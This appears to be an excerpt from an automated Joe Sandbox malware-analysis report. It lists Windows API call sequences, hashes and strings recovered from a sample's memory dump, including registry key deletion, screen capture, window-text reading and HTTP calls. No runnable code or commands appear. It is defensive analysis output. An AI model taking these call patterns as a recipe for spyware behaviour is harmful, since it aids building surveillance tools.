                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3800310941-3916222277
                                                                                                                                                • Opcode ID: 6b930c949d92825ea1014823eb115156774a3fe86c6d1220cc4305bfff42fd79
                                                                                                                                                • Instruction ID: 1da63c4212332422591b74ff5d8e0d8ed97db875fa0324c9c5e34415ac61f9c5
                                                                                                                                                • Opcode Fuzzy Hash: 6b930c949d92825ea1014823eb115156774a3fe86c6d1220cc4305bfff42fd79
                                                                                                                                                • Instruction Fuzzy Hash: 4B518DB4111205BFDB21AF60DD48AAB7BFCFF09354F20441AF945A6690DB34E9549B70
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 002A8592
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002A85A2
                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002A85AD
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002A85BA
                                                                                                                                                • GlobalLock.KERNEL32 ref: 002A85C8
                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002A85D7
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002A85E0
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002A85E7
                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 002A85F8
                                                                                                                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,002AFC38,?), ref: 002A8611
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 002A8621
                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 002A8641
                                                                                                                                                • CopyImage.USER32 ref: 002A8671
                                                                                                                                                • DeleteObject.GDI32(?), ref: 002A8699
                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002A86AF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3840717409-0
                                                                                                                                                • Opcode ID: 7b3ad6e432c2a4a18c19344ed5e24507156edafecc9868ffd2d8a05df8015821
                                                                                                                                                • Instruction ID: 26bcb3858562aaa66f9513b03acbf8916c2b3ebda65f9301a71187a12694e2ba
                                                                                                                                                • Opcode Fuzzy Hash: 7b3ad6e432c2a4a18c19344ed5e24507156edafecc9868ffd2d8a05df8015821
                                                                                                                                                • Instruction Fuzzy Hash: 0F41E675600209AFDB119FA5DC4CEAA7BBCEB8AB11F244059F909E7260DF709911CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00281502
                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0028150B
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00281517
                                                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002815FB
                                                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00281657
                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00281708
                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0028178C
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 002817D8
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 002817E7
                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00281823
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                • API String ID: 1234038744-3931177956
                                                                                                                                                • Opcode ID: 72e88432130227a9c9e36638e6ec34a604ed190f2ddeae3065da253e7dd1f814
                                                                                                                                                • Instruction ID: a16ab7a19080fab41a03e38465f35426b62feb623462d7b6335a588a275393f9
                                                                                                                                                • Opcode Fuzzy Hash: 72e88432130227a9c9e36638e6ec34a604ed190f2ddeae3065da253e7dd1f814
                                                                                                                                                • Instruction Fuzzy Hash: CBD12336A21111EBDB10AF64E884B7DB7B9BF46700F64806AF446AB1C0DB74EC72DB51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                  • Part of subcall function 0029C998: CharUpperBuffW.USER32(?,?), ref: 0029C9B5
                                                                                                                                                  • Part of subcall function 0029C998: _wcslen.LIBCMT ref: 0029C9F1
                                                                                                                                                  • Part of subcall function 0029C998: _wcslen.LIBCMT ref: 0029CA68
                                                                                                                                                  • Part of subcall function 0029C998: _wcslen.LIBCMT ref: 0029CA9E
                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0029B6F4
                                                                                                                                                • RegOpenKeyExW.ADVAPI32 ref: 0029B772
                                                                                                                                                • RegDeleteValueW.ADVAPI32 ref: 0029B80A
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0029B87E
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0029B89C
                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0029B8F2
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0029B904
                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0029B922
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0029B983
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0029B994
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                • API String ID: 146587525-4033151799
                                                                                                                                                • Opcode ID: 79a26237770e3b9a511611c69ad78d5ba99e02434bc5bafd9e005e2447d196c5
                                                                                                                                                • Instruction ID: 81d5ce16dd4192800b818cb28e4171a7e8df9904c530d323a4731867a97efea1
                                                                                                                                                • Opcode Fuzzy Hash: 79a26237770e3b9a511611c69ad78d5ba99e02434bc5bafd9e005e2447d196c5
                                                                                                                                                • Instruction Fuzzy Hash: 0DC1BF34224202AFDB11DF14D594F6ABBE5BF84308F14859CF59A4B2A2CB71EC95CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 002925D8
                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002925E8
                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 002925F4
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00292601
                                                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0029266D
                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002926AC
                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002926D0
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 002926D8
                                                                                                                                                • DeleteObject.GDI32(?), ref: 002926E1
                                                                                                                                                • DeleteDC.GDI32(?), ref: 002926E8
                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 002926F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                • String ID: (
                                                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                                                • Opcode ID: 5d3e5f36a5c3c32a19b916e6a346f22118075a7a19bc4a0e5eda02a97107b6c9
                                                                                                                                                • Instruction ID: 449b65879a59eab2da307b64067864e3f6a40ba1aa2e941b402a44e22032466c
                                                                                                                                                • Opcode Fuzzy Hash: 5d3e5f36a5c3c32a19b916e6a346f22118075a7a19bc4a0e5eda02a97107b6c9
                                                                                                                                                • Instruction Fuzzy Hash: B961D475E10219EFCF05CFA4D984AAEBBF9FF48310F208529E959A7250D770A951CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0027369C
                                                                                                                                                • _wcslen.LIBCMT ref: 002736A7
                                                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00273797
                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0027380C
                                                                                                                                                • GetDlgCtrlID.USER32 ref: 0027385D
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00273882
                                                                                                                                                • GetParent.USER32(?), ref: 002738A0
                                                                                                                                                • ScreenToClient.USER32(00000000), ref: 002738A7
                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00273921
                                                                                                                                                • GetWindowTextW.USER32 ref: 0027395D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                                                • String ID: %s%u
                                                                                                                                                • API String ID: 4010501982-679674701
                                                                                                                                                • Opcode ID: 9c1ddf7b4fd22764f561b68804577d8e642c9925c636fc95728016f65e2fee74
                                                                                                                                                • Instruction ID: dcf691f487f3b65d653ebb0e39a3da2cdcf986de4ecc96a978d3ad1e753eca92
                                                                                                                                                • Opcode Fuzzy Hash: 9c1ddf7b4fd22764f561b68804577d8e642c9925c636fc95728016f65e2fee74
                                                                                                                                                • Instruction Fuzzy Hash: E591BC71224607EFD719DF24C885BAAF7A8FF44310F108629FA9DC2190DB30EA65DB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00274994
                                                                                                                                                • GetWindowTextW.USER32 ref: 002749DA
                                                                                                                                                • _wcslen.LIBCMT ref: 002749EB
                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 002749F7
                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00274A2C
                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00274A64
                                                                                                                                                • GetWindowTextW.USER32 ref: 00274A9D
                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00274AE6
                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00274B20
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00274B8B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                • API String ID: 1311036022-1241985126
                                                                                                                                                • Opcode ID: a0f271917c07a1e5c8e93f69cb946fc1d6b47d42bac683d4c86e31cf3b4c2413
                                                                                                                                                • Instruction ID: 11e0d711786fda7d9663648fd65e6b31e6a5b9da6773350422ef88b39255ddd6
                                                                                                                                                • Opcode Fuzzy Hash: a0f271917c07a1e5c8e93f69cb946fc1d6b47d42bac683d4c86e31cf3b4c2413
                                                                                                                                                • Instruction Fuzzy Hash: 2691D1714242069FDB05EF14C885FAAB7E8FF84714F04C46AFD899A096DB30ED65CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2
                                                                                                                                                • PostMessageW.USER32 ref: 002A8D5A
                                                                                                                                                • GetFocus.USER32 ref: 002A8D6A
                                                                                                                                                • GetDlgCtrlID.USER32 ref: 002A8D75
                                                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 002A8E1D
                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 002A8ECF
                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 002A8EEC
                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 002A8EFC
                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 002A8F2E
                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 002A8F70
                                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002A8FA1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                • String ID: 0
                                                                                                                                                • API String ID: 1026556194-4108050209
                                                                                                                                                • Opcode ID: 527e53b7474657c05bfb1d939ce9c08c1b32dc84b230e7ebcb82a7d1a8da2b17
                                                                                                                                                • Instruction ID: 1cd57224e16c31c6acdca1b7961ff8c17b89add1800989e6b3bb20c83b3bff07
                                                                                                                                                • Opcode Fuzzy Hash: 527e53b7474657c05bfb1d939ce9c08c1b32dc84b230e7ebcb82a7d1a8da2b17
                                                                                                                                                • Instruction Fuzzy Hash: 7B8192715143029FDB10CF24D984A6BBBE9FB8A754F140929F985D7291DF70D920CF62
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0029CC64
                                                                                                                                                • RegOpenKeyExW.ADVAPI32 ref: 0029CC8D
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0029CD48
                                                                                                                                                  • Part of subcall function 0029CC34: RegCloseKey.ADVAPI32(?), ref: 0029CCAA
                                                                                                                                                  • Part of subcall function 0029CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 0029CCBD
                                                                                                                                                  • Part of subcall function 0029CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 0029CCCF
                                                                                                                                                  • Part of subcall function 0029CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0029CD05
                                                                                                                                                  • Part of subcall function 0029CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0029CD28
                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0029CCF3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                • API String ID: 2734957052-4033151799
                                                                                                                                                • Opcode ID: 4fd555ce7e9eafbf2c7a93478ab2ec87e7411b5c2ba5163fb8c9dfe4fab4f84c
                                                                                                                                                • Instruction ID: 3c0574f1cf9cded1bfff12894f067eff21a9d7df2a5251338d29bd26e93ae871
                                                                                                                                                • Opcode Fuzzy Hash: 4fd555ce7e9eafbf2c7a93478ab2ec87e7411b5c2ba5163fb8c9dfe4fab4f84c
                                                                                                                                                • Instruction Fuzzy Hash: 32316E71A11129BBDB208F54DC8CEFFBB7CEF46750F200165E909E2240DA749E45AAB0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • timeGetTime.WINMM ref: 0027E6B4
                                                                                                                                                  • Part of subcall function 0022E551: timeGetTime.WINMM ref: 0022E555
                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0027E6E1
                                                                                                                                                • EnumThreadWindows.USER32 ref: 0027E705
                                                                                                                                                • FindWindowExW.USER32 ref: 0027E727
                                                                                                                                                • SetActiveWindow.USER32 ref: 0027E746
                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0027E754
                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0027E773
                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 0027E77E
                                                                                                                                                • IsWindow.USER32 ref: 0027E78A
                                                                                                                                                • EndDialog.USER32 ref: 0027E79B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                • String ID: BUTTON
                                                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                                                • Opcode ID: 86540c119219bb212740a0133a43f280bac35be7b5a1361cead5caac465b5e20
                                                                                                                                                • Instruction ID: c0c52ca9ee503e2595f80a1d37c42a06ae513f437e6904e12cb03eacc4618e40
                                                                                                                                                • Opcode Fuzzy Hash: 86540c119219bb212740a0133a43f280bac35be7b5a1361cead5caac465b5e20
                                                                                                                                                • Instruction Fuzzy Hash: 7021D1B0660245EFEF009F24FCCDA257B6DF75A748B218465F90E861A1DFB1AC248A34
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0027EA5D
                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0027EA73
                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0027EA84
                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0027EA96
                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0027EAA7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: SendString$_wcslen
                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                • API String ID: 2420728520-1007645807
                                                                                                                                                • Opcode ID: 9f1b5a7f1f03d02dd4c1535d4263f585cc00eff70e780e532a6206c5da007f28
                                                                                                                                                • Instruction ID: d6e16fbec0d9599083504087e5772762916dfb6f6746c9982dc9d538bc17d2ac
                                                                                                                                                • Opcode Fuzzy Hash: 9f1b5a7f1f03d02dd4c1535d4263f585cc00eff70e780e532a6206c5da007f28
                                                                                                                                                • Instruction Fuzzy Hash: D311773167025979DB20E7A5DC5EDFF6BBCEBD6B00F000466B415A21D1DE701DA5C9B0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00228F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00228FC5
                                                                                                                                                • DestroyWindow.USER32 ref: 00228C81
                                                                                                                                                • KillTimer.USER32 ref: 00228D1B
                                                                                                                                                • DestroyAcceleratorTable.USER32 ref: 00266973
